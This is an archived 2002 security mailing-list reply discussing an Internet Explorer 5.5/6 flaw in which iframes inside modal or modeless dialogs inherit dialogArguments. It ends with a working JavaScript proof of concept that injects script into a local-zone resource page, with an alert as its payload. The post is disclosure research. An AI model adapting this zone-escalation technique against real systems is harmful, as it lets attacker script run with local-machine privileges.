>IFRAME in a page opened by "openModalDialog" has "dialogArguments" of its >parent. The method is "showModalDialog" and not "openModalDialog". It's worth noting that "showModelessDialog" is also vulnerable. >/*note: please tell me if "MSIE SP1" allows an internet page contains an >iframe with local content*/ Normally, it doesn't. But it seems like Microsoft applied that rule to normal windows and forgot to do the same for dialogs. >in the demo: >(*)"victim zone" is localzone; >(*)the page from victim zone is "res://shdoclc.dll/privacypolicy.dlg"; it >uses "cookieUrl" without filtering. This vulnerability is very similar to the redirect vulnerability in dialogs presented by Thor Larholm back in March and it has the same impact. But just like Larholm's initial advisory was confined to IE 6, Liu's is confined to IE 6 as well. This is a result of using "privacypolicy.dlg" for exploitation, which was not shipped prior to version 6. However, IE 5.5 is also vulnerable, and can be exploited by using the "analyze.dlg" resource, which we published immediately after Thor's advisory at the time. Notice that IE 5.0 is not vulnerable to this flaw at all. It seems like many of the recent IE vulnerabilities emerge from the global change made to windows (including frames and iframes) in IE 5.5. The following proof-of-concept code will work on both (fully patched) IE 5.5 and IE 6: /* Online demonstration at http://security.greymagic.com/misc/globalDgArg/ */ function oExploit(iSec) { return { rel:"stylesheet", readyState:"exploit", href:sHTML }; } oExploit.length=1; var sHTML="<scr\ipt defer>alert(location.href)</scr\ipt>", oSecurity={ document:{ all:{ tags:function (sTag) { return sTag=="link" ? oExploit : []; } } } } // base.html contains <iframe src="res://shdoclc.dll/analyze.dlg"></iframe> showModalDialog("base.html",oSecurity);
This archive was generated by hypermail 2b30 : Sat Nov 23 2002 - 19:29:49 PST